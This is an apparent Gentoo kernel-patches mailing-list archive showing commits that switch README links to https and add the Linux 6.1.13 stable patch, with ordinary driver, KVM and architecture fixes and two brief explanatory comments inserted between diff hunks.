++++ b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
+@@ -428,6 +428,7 @@ static void *juggle_shinfo_state(void *arg)
+ int main(int argc, char *argv[])
+ {
+ 	struct timespec min_ts, max_ts, vm_ts;
++	struct kvm_xen_hvm_attr evt_reset;
+ 	struct kvm_vm *vm;
+ 	pthread_t thread;
+ 	bool verbose;
+@@ -942,6 +943,10 @@ int main(int argc, char *argv[])
+ 	}
+ 
+  done:
++	evt_reset.type = KVM_XEN_ATTR_TYPE_EVTCHN;
++	evt_reset.u.evtchn.flags = KVM_XEN_EVTCHN_RESET;
++	vm_ioctl(vm, KVM_XEN_HVM_SET_ATTR, &evt_reset);
++
+ 	alarm(0);
+ 	clock_gettime(CLOCK_REALTIME, &max_ts);
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-24  3:03 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-24  3:03 UTC (permalink / raw)
  To: gentoo-commits

commit:     5ae3ab31650bb433a32d16f5f1a157d0013400a3
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 24 02:56:16 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Fri Feb 24 02:58:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5ae3ab31

0000_README: use https:// instead of http:// by default

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README | 26 +++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)

diff --git a/0000_README b/0000_README
index 8acd931c..dee78b52 100644
--- a/0000_README
+++ b/0000_README
@@ -44,55 +44,55 @@ Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
 Patch:  1000_linux-6.1.1.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.1
 
 Patch:  1001_linux-6.1.2.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.2
 
 Patch:  1002_linux-6.1.3.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.3
 
 Patch:  1003_linux-6.1.4.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.4
 
 Patch:  1004_linux-6.1.5.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.5
 
 Patch:  1005_linux-6.1.6.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.6
 
 Patch:  1006_linux-6.1.7.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.7
 
 Patch:  1007_linux-6.1.8.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.8
 
 Patch:  1008_linux-6.1.9.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.9
 
 Patch:  1009_linux-6.1.10.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.10
 
 Patch:  1010_linux-6.1.11.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.11
 
 Patch:  1011_linux-6.1.12.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.12
 
 Patch:  1012_linux-6.1.13.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.13
 
 Patch:  1500_XATTR_USER_PREFIX.patch


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-22 13:46 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-22 13:46 UTC (permalink / raw)
  To: gentoo-commits

commit:     0925121469bc5673fc8b3c65d401bf29ddb2aa59
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Feb 22 13:03:12 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Feb 22 13:03:12 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09251214

Linux patch 6.1.13

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1012_linux-6.1.13.patch | 4572 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4576 insertions(+)

diff --git a/0000_README b/0000_README
index 92068c30..8acd931c 100644
--- a/0000_README
+++ b/0000_README
@@ -91,6 +91,10 @@ Patch:  1011_linux-6.1.12.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.12
 
+Patch:  1012_linux-6.1.13.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.13
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1012_linux-6.1.13.patch b/1012_linux-6.1.13.patch
new file mode 100644
index 00000000..3534e40f
--- /dev/null
+++ b/1012_linux-6.1.13.patch
@@ -0,0 +1,4572 @@
+diff --git a/Makefile b/Makefile
+index 23390805e5217..e51356b982f90 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 12
++SUBLEVEL = 13
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index 0b7d01d408ac8..eb6d094083fd6 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -173,6 +173,15 @@ static inline notrace unsigned long irq_soft_mask_or_return(unsigned long mask)
+ 	return flags;
+ }
+ 
++static inline notrace unsigned long irq_soft_mask_andc_return(unsigned long mask)
++{
++	unsigned long flags = irq_soft_mask_return();
++
++	irq_soft_mask_set(flags & ~mask);
++
++	return flags;
++}
++
+ static inline unsigned long arch_local_save_flags(void)
+ {
+ 	return irq_soft_mask_return();
+@@ -331,10 +340,11 @@ bool power_pmu_wants_prompt_pmi(void);
+  * is a different soft-masked interrupt pending that requires hard
+  * masking.
+  */
+-static inline bool should_hard_irq_enable(void)
++static inline bool should_hard_irq_enable(struct pt_regs *regs)
+ {
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+-		WARN_ON(irq_soft_mask_return() == IRQS_ENABLED);
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++		WARN_ON(!(get_paca()->irq_happened & PACA_IRQ_HARD_DIS));
+ 		WARN_ON(mfmsr() & MSR_EE);
+ 	}
+ 
+@@ -347,8 +357,17 @@ static inline bool should_hard_irq_enable(void)
+ 	 *
+ 	 * TODO: Add test for 64e
+ 	 */
+-	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64) && !power_pmu_wants_prompt_pmi())
+-		return false;
++	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64)) {
++		if (!power_pmu_wants_prompt_pmi())
++			return false;
++		/*
++		 * If PMIs are disabled then IRQs should be disabled as well,
++		 * so we shouldn't see this condition, check for it just in
++		 * case because we are about to enable PMIs.
++		 */
++		if (WARN_ON_ONCE(regs->softe & IRQS_PMI_DISABLED))
++			return false;
++	}
+ 
+ 	if (get_paca()->irq_happened & PACA_IRQ_MUST_HARD_MASK)
+ 		return false;
+@@ -358,18 +377,16 @@ static inline bool should_hard_irq_enable(void)
+ 
+ /*
+  * Do the hard enabling, only call this if should_hard_irq_enable is true.
++ * This allows PMI interrupts to profile irq handlers.
+  */
+ static inline void do_hard_irq_enable(void)
+ {
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+-		WARN_ON(irq_soft_mask_return() == IRQS_ENABLED);
+-		WARN_ON(get_paca()->irq_happened & PACA_IRQ_MUST_HARD_MASK);
+-		WARN_ON(mfmsr() & MSR_EE);
+-	}
+ 	/*
+-	 * This allows PMI interrupts (and watchdog soft-NMIs) through.
+-	 * There is no other reason to enable this way.
++	 * Asynch interrupts come in with IRQS_ALL_DISABLED,
++	 * PACA_IRQ_HARD_DIS, and MSR[EE]=0.
+ 	 */
++	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64))
++		irq_soft_mask_andc_return(IRQS_PMI_DISABLED);
+ 	get_paca()->irq_happened &= ~PACA_IRQ_HARD_DIS;
+ 	__hard_irq_enable();
+ }
+@@ -452,7 +469,7 @@ static inline bool arch_irq_disabled_regs(struct pt_regs *regs)
+ 	return !(regs->msr & MSR_EE);
+ }
+ 
+-static __always_inline bool should_hard_irq_enable(void)
++static __always_inline bool should_hard_irq_enable(struct pt_regs *regs)
+ {
+ 	return false;
+ }
+diff --git a/arch/powerpc/kernel/dbell.c b/arch/powerpc/kernel/dbell.c
+index f55c6fb34a3a0..5712dd846263c 100644
+--- a/arch/powerpc/kernel/dbell.c
++++ b/arch/powerpc/kernel/dbell.c
+@@ -27,7 +27,7 @@ DEFINE_INTERRUPT_HANDLER_ASYNC(doorbell_exception)
+ 
+ 	ppc_msgsync();
+ 
+-	if (should_hard_irq_enable())
++	if (should_hard_irq_enable(regs))
+ 		do_hard_irq_enable();
+ 
+ 	kvmppc_clear_host_ipi(smp_processor_id());
+diff --git a/arch/powerpc/kernel/irq.c b/arch/powerpc/kernel/irq.c
+index 9ede61a5a469e..55142ff649f3f 100644
+--- a/arch/powerpc/kernel/irq.c
++++ b/arch/powerpc/kernel/irq.c
+@@ -238,7 +238,7 @@ static void __do_irq(struct pt_regs *regs, unsigned long oldsp)
+ 	irq = static_call(ppc_get_irq)();
+ 
+ 	/* We can hard enable interrupts now to allow perf interrupts */
+-	if (should_hard_irq_enable())
++	if (should_hard_irq_enable(regs))
+ 		do_hard_irq_enable();
+ 
+ 	/* And finally process it */
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index a2ab397065c66..f157552d79b38 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -533,7 +533,7 @@ DEFINE_INTERRUPT_HANDLER_ASYNC(timer_interrupt)
+ 	}
+ 
+ 	/* Conditionally hard-enable interrupts. */
+-	if (should_hard_irq_enable()) {
++	if (should_hard_irq_enable(regs)) {
+ 		/*
+ 		 * Ensure a positive value is written to the decrementer, or
+ 		 * else some CPUs will continue to take decrementer exceptions.
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index e27c2140d6206..623f6775d01d7 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -80,6 +80,6 @@ void *decompress_kernel(void)
+ 	void *output = (void *)decompress_offset;
+ 
+ 	__decompress(_compressed_start, _compressed_end - _compressed_start,
+-		     NULL, NULL, output, 0, NULL, error);
++		     NULL, NULL, output, vmlinux.image_size, NULL, error);
+ 	return output;
+ }
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index b30b8bbcd1e22..30fb4931d3871 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -2994,17 +2994,19 @@ unsigned long perf_misc_flags(struct pt_regs *regs)
+ 
+ void perf_get_x86_pmu_capability(struct x86_pmu_capability *cap)
+ {
+-	if (!x86_pmu_initialized()) {
++	/* This API doesn't currently support enumerating hybrid PMUs. */
++	if (WARN_ON_ONCE(cpu_feature_enabled(X86_FEATURE_HYBRID_CPU)) ||
++	    !x86_pmu_initialized()) {
+ 		memset(cap, 0, sizeof(*cap));
+ 		return;
+ 	}
+ 
+-	cap->version		= x86_pmu.version;
+ 	/*
+-	 * KVM doesn't support the hybrid PMU yet.
+-	 * Return the common value in global x86_pmu,
+-	 * which available for all cores.
++	 * Note, hybrid CPU models get tracked as having hybrid PMUs even when
++	 * all E-cores are disabled via BIOS.  When E-cores are disabled, the
++	 * base PMU holds the correct number of counters for P-cores.
+ 	 */
++	cap->version		= x86_pmu.version;
+ 	cap->num_counters_gp	= x86_pmu.num_counters;
+ 	cap->num_counters_fixed	= x86_pmu.num_counters_fixed;
+ 	cap->bit_width_gp	= x86_pmu.cntval_bits;
+diff --git a/arch/x86/kvm/pmu.h b/arch/x86/kvm/pmu.h
+index 5cc5721f260bf..c976490b75568 100644
+--- a/arch/x86/kvm/pmu.h
++++ b/arch/x86/kvm/pmu.h
+@@ -164,15 +164,27 @@ static inline void kvm_init_pmu_capability(void)
+ {
+ 	bool is_intel = boot_cpu_data.x86_vendor == X86_VENDOR_INTEL;
+ 
+-	perf_get_x86_pmu_capability(&kvm_pmu_cap);
+-
+-	 /*
+-	  * For Intel, only support guest architectural pmu
+-	  * on a host with architectural pmu.
+-	  */
+-	if ((is_intel && !kvm_pmu_cap.version) || !kvm_pmu_cap.num_counters_gp)
++	/*
++	 * Hybrid PMUs don't play nice with virtualization without careful
++	 * configuration by userspace, and KVM's APIs for reporting supported
++	 * vPMU features do not account for hybrid PMUs.  Disable vPMU support
++	 * for hybrid PMUs until KVM gains a way to let userspace opt-in.
++	 */
++	if (cpu_feature_enabled(X86_FEATURE_HYBRID_CPU))
+ 		enable_pmu = false;
+ 
++	if (enable_pmu) {
++		perf_get_x86_pmu_capability(&kvm_pmu_cap);
++
++		/*
++		 * For Intel, only support guest architectural pmu
++		 * on a host with architectural pmu.
++		 */
++		if ((is_intel && !kvm_pmu_cap.version) ||
++		    !kvm_pmu_cap.num_counters_gp)
++			enable_pmu = false;
++	}
++
+ 	if (!enable_pmu) {
+ 		memset(&kvm_pmu_cap, 0, sizeof(kvm_pmu_cap));
+ 		return;
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a0c35b948c30b..05ca303d7fd98 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5250,12 +5250,11 @@ static void kvm_vcpu_ioctl_x86_get_debugregs(struct kvm_vcpu *vcpu,
+ {
+ 	unsigned long val;
+ 
++	memset(dbgregs, 0, sizeof(*dbgregs));
+ 	memcpy(dbgregs->db, vcpu->arch.db, sizeof(vcpu->arch.db));
+ 	kvm_get_dr(vcpu, 6, &val);
+ 	dbgregs->dr6 = val;
+ 	dbgregs->dr7 = vcpu->arch.dr7;
+-	dbgregs->flags = 0;
+-	memset(&dbgregs->reserved, 0, sizeof(dbgregs->reserved));
+ }
+ 
+ static int kvm_vcpu_ioctl_x86_set_debugregs(struct kvm_vcpu *vcpu,
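[Editor's sketch] The memset-first rework above is the canonical hardening pattern for structures copied out to userspace: zeroing the whole object up front covers padding bytes and any reserved or later-added fields, instead of clearing members one by one. In miniature (all names here are illustrative, not from the patch):

struct user_visible out;

memset(&out, 0, sizeof(out));	/* padding and reserved fields stay zero */
out.a = state->a;		/* then fill in only the meaningful members */
out.b = state->b;
if (copy_to_user(uptr, &out, sizeof(out)))
	return -EFAULT;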
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 53ab2306da009..17bb0d8158ca0 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,6 +422,7 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
++	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 26a75f5cce95b..a5ea144722fa3 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -4044,6 +4044,9 @@ static const struct ata_blacklist_entry ata_device_blacklist [] = {
+ 	{ "Samsung SSD 870*",		NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
+ 						ATA_HORKAGE_ZERO_AFTER_TRIM |
+ 						ATA_HORKAGE_NO_NCQ_ON_ATI },
++	{ "SAMSUNG*MZ7LH*",		NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
++						ATA_HORKAGE_ZERO_AFTER_TRIM |
++						ATA_HORKAGE_NO_NCQ_ON_ATI, },
+ 	{ "FCCT*M500*",			NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
+ 						ATA_HORKAGE_ZERO_AFTER_TRIM },
+ 
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index 1020c2feb2496..cff68f31a09fd 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -732,7 +732,7 @@ static void gpio_sim_remove_hogs(struct gpio_sim_device *dev)
+ 
+ 	gpiod_remove_hogs(dev->hogs);
+ 
+-	for (hog = dev->hogs; !hog->chip_label; hog++) {
++	for (hog = dev->hogs; hog->chip_label; hog++) {
+ 		kfree(hog->chip_label);
+ 		kfree(hog->line_name);
+ 	}
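[Editor's sketch] For context, the corrected condition walks a sentinel-terminated array: entries are valid while chip_label is non-NULL and the array ends with a zeroed entry. The inverted test made the loop body unreachable for any populated array, leaking every label. Schematically (free_hog_entry() is illustrative):

for (hog = dev->hogs; hog->chip_label; hog++)	/* stop at the sentinel */
	free_hog_entry(hog);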
+diff --git a/drivers/gpu/drm/Kconfig b/drivers/gpu/drm/Kconfig
+index 34f5a092c99e7..f30f99166531f 100644
+--- a/drivers/gpu/drm/Kconfig
++++ b/drivers/gpu/drm/Kconfig
+@@ -53,7 +53,8 @@ config DRM_DEBUG_MM
+ 
+ config DRM_USE_DYNAMIC_DEBUG
+ 	bool "use dynamic debug to implement drm.debug"
+-	default y
++	default n
++	depends on BROKEN
+ 	depends on DRM
+ 	depends on DYNAMIC_DEBUG || DYNAMIC_DEBUG_CORE
+ 	depends on JUMP_LABEL
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 8f83d5b6ceaad..a21b3f66fd708 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4248,6 +4248,9 @@ int amdgpu_device_resume(struct drm_device *dev, bool fbcon)
+ #endif
+ 	adev->in_suspend = false;
+ 
++	if (adev->enable_mes)
++		amdgpu_mes_self_test(adev);
++
+ 	if (amdgpu_acpi_smart_shift_update(dev, AMDGPU_SS_DEV_D0))
+ 		DRM_WARN("smart shift update failed\n");
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 32b0ea8757fa5..6f0e389be5f6a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -1339,7 +1339,7 @@ static int mes_v11_0_late_init(void *handle)
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+ 	/* it's only intended for use in mes_self_test case, not for s0ix and reset */
+-	if (!amdgpu_in_reset(adev) && !adev->in_s0ix &&
++	if (!amdgpu_in_reset(adev) && !adev->in_s0ix && !adev->in_suspend &&
+ 	    (adev->ip_versions[GC_HWIP][0] != IP_VERSION(11, 0, 3)))
+ 		amdgpu_mes_self_test(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9bc9852b9cda9..230e15fed755c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -643,7 +643,8 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_CG_SUPPORT_GFX_CGCG |
+ 			AMD_CG_SUPPORT_GFX_CGLS |
+ 			AMD_CG_SUPPORT_REPEATER_FGCG |
+-			AMD_CG_SUPPORT_GFX_MGCG;
++			AMD_CG_SUPPORT_GFX_MGCG |
++			AMD_CG_SUPPORT_HDP_SD;
+ 		adev->pg_flags = AMD_PG_SUPPORT_VCN |
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_JPEG;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 988b1c947aefc..e9c4f22696c5c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4526,6 +4526,17 @@ DEVICE_ATTR_WO(s3_debug);
+ static int dm_early_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	struct amdgpu_mode_info *mode_info = &adev->mode_info;
++	struct atom_context *ctx = mode_info->atom_context;
++	int index = GetIndexIntoMasterTable(DATA, Object_Header);
++	u16 data_offset;
++
++	/* if there is no object header, skip DM */
++	if (!amdgpu_atom_parse_data_header(ctx, index, NULL, NULL, NULL, &data_offset)) {
++		adev->harvest_ip_mask |= AMD_HARVEST_IP_DMU_MASK;
++		dev_info(adev->dev, "No object header, skipping DM\n");
++		return -ENOENT;
++	}
+ 
+ 	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+@@ -9545,7 +9556,11 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	 * `dcn10_can_pipe_disable_cursor`). By now, all modified planes are in
+ 	 * atomic state, so call drm helper to normalize zpos.
+ 	 */
+-	drm_atomic_normalize_zpos(dev, state);
++	ret = drm_atomic_normalize_zpos(dev, state);
++	if (ret) {
++		drm_dbg(dev, "drm_atomic_normalize_zpos() failed\n");
++		goto fail;
++	}
+ 
+ 	/* Remove exiting planes if they are modified */
+ 	for_each_oldnew_plane_in_state_reverse(state, plane, old_plane_state, new_plane_state, i) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9066c511a0529..c80c8c8f51e97 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -871,8 +871,9 @@ static const struct dc_plane_cap plane_cap = {
+ 	},
+ 
+ 	// 6:1 downscaling ratio: 1000/6 = 166.666
++	// 4:1 downscaling ratio for ARGB888 to prevent underflow during P010 playback: 1000/4 = 250
+ 	.max_downscale_factor = {
+-			.argb8888 = 167,
++			.argb8888 = 250,
+ 			.nv12 = 167,
+ 			.fp16 = 167
+ 	},
+@@ -1755,7 +1756,7 @@ static bool dcn314_resource_construct(
+ 	pool->base.underlay_pipe_index = NO_UNDERLAY_PIPE;
+ 	pool->base.pipe_count = pool->base.res_cap->num_timing_generator;
+ 	pool->base.mpcc_count = pool->base.res_cap->num_timing_generator;
+-	dc->caps.max_downscale_ratio = 600;
++	dc->caps.max_downscale_ratio = 400;
+ 	dc->caps.i2c_speed_in_khz = 100;
+ 	dc->caps.i2c_speed_in_khz_hdcp = 100;
+ 	dc->caps.max_cursor_size = 256;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
+index 45a949ba6f3f3..7b7f0e6b2a2ff 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
+@@ -94,7 +94,7 @@ static const struct hw_sequencer_funcs dcn32_funcs = {
+ 	.get_vupdate_offset_from_vsync = dcn10_get_vupdate_offset_from_vsync,
+ 	.calc_vupdate_position = dcn10_calc_vupdate_position,
+ 	.apply_idle_power_optimizations = dcn32_apply_idle_power_optimizations,
+-	.does_plane_fit_in_mall = dcn30_does_plane_fit_in_mall,
++	.does_plane_fit_in_mall = NULL,
+ 	.set_backlight_level = dcn21_set_backlight_level,
+ 	.set_abm_immediate_disable = dcn21_set_abm_immediate_disable,
+ 	.hardware_release = dcn30_hardware_release,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 0d12fd079cd61..3afd3c80e6da8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -3184,7 +3184,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 		} else {
+ 			v->MIN_DST_Y_NEXT_START[k] = v->VTotal[k] - v->VFrontPorch[k] + v->VTotal[k] - v->VActive[k] - v->VStartup[k];
+ 		}
+-		v->MIN_DST_Y_NEXT_START[k] += dml_floor(4.0 * v->TSetup[k] / (double)v->HTotal[k] / v->PixelClock[k], 1.0) / 4.0;
++		v->MIN_DST_Y_NEXT_START[k] += dml_floor(4.0 * v->TSetup[k] / ((double)v->HTotal[k] / v->PixelClock[k]), 1.0) / 4.0;
+ 		if (((v->VUpdateOffsetPix[k] + v->VUpdateWidthPix[k] + v->VReadyOffsetPix[k]) / v->HTotal[k])
+ 				<= (isInterlaceTiming ?
+ 						dml_floor((v->VTotal[k] - v->VActive[k] - v->VFrontPorch[k] - v->VStartup[k]) / 2.0, 1.0) :
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 4a122925c3ae9..92c18bfb98b3b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -532,6 +532,9 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+ 	if (dmub->hw_funcs.reset)
+ 		dmub->hw_funcs.reset(dmub);
+ 
++	/* reset the cache of the last wptr as well now that hw is reset */
++	dmub->inbox1_last_wptr = 0;
++
+ 	cw0.offset.quad_part = inst_fb->gpu_addr;
+ 	cw0.region.base = DMUB_CW0_BASE;
+ 	cw0.region.top = cw0.region.base + inst_fb->size - 1;
+@@ -649,6 +652,15 @@ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub)
+ 	if (dmub->hw_funcs.reset)
+ 		dmub->hw_funcs.reset(dmub);
+ 
++	/* mailboxes have been reset in hw, so reset the sw state as well */
++	dmub->inbox1_last_wptr = 0;
++	dmub->inbox1_rb.wrpt = 0;
++	dmub->inbox1_rb.rptr = 0;
++	dmub->outbox0_rb.wrpt = 0;
++	dmub->outbox0_rb.rptr = 0;
++	dmub->outbox1_rb.wrpt = 0;
++	dmub->outbox1_rb.rptr = 0;
++
+ 	dmub->hw_init = false;
+ 
+ 	return DMUB_STATUS_OK;
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 41635694e5216..2f3e239e623dc 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2009,14 +2009,16 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
+ 		      gc_ver == IP_VERSION(10, 3, 0) ||
+ 		      gc_ver == IP_VERSION(10, 1, 2) ||
+ 		      gc_ver == IP_VERSION(11, 0, 0) ||
+-		      gc_ver == IP_VERSION(11, 0, 2)))
++		      gc_ver == IP_VERSION(11, 0, 2) ||
++		      gc_ver == IP_VERSION(11, 0, 3)))
+ 			*states = ATTR_STATE_UNSUPPORTED;
+ 	} else if (DEVICE_ATTR_IS(pp_dpm_dclk)) {
+ 		if (!(gc_ver == IP_VERSION(10, 3, 1) ||
+ 		      gc_ver == IP_VERSION(10, 3, 0) ||
+ 		      gc_ver == IP_VERSION(10, 1, 2) ||
+ 		      gc_ver == IP_VERSION(11, 0, 0) ||
+-		      gc_ver == IP_VERSION(11, 0, 2)))
++		      gc_ver == IP_VERSION(11, 0, 2) ||
++		      gc_ver == IP_VERSION(11, 0, 3)))
+ 			*states = ATTR_STATE_UNSUPPORTED;
+ 	} else if (DEVICE_ATTR_IS(pp_power_profile_mode)) {
+ 		if (amdgpu_dpm_get_power_profile_mode(adev, NULL) == -EOPNOTSUPP)
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index a821e3d405dbe..86621dff868df 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -1249,6 +1249,13 @@ icl_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 		    GAMT_CHKN_BIT_REG,
+ 		    GAMT_CHKN_DISABLE_L3_COH_PIPE);
+ 
++	/*
++	 * Wa_1408615072:icl,ehl  (vsunit)
++	 * Wa_1407596294:icl,ehl  (hsunit)
++	 */
++	wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE,
++		    VSUNIT_CLKGATE_DIS | HSUNIT_CLKGATE_DIS);
++
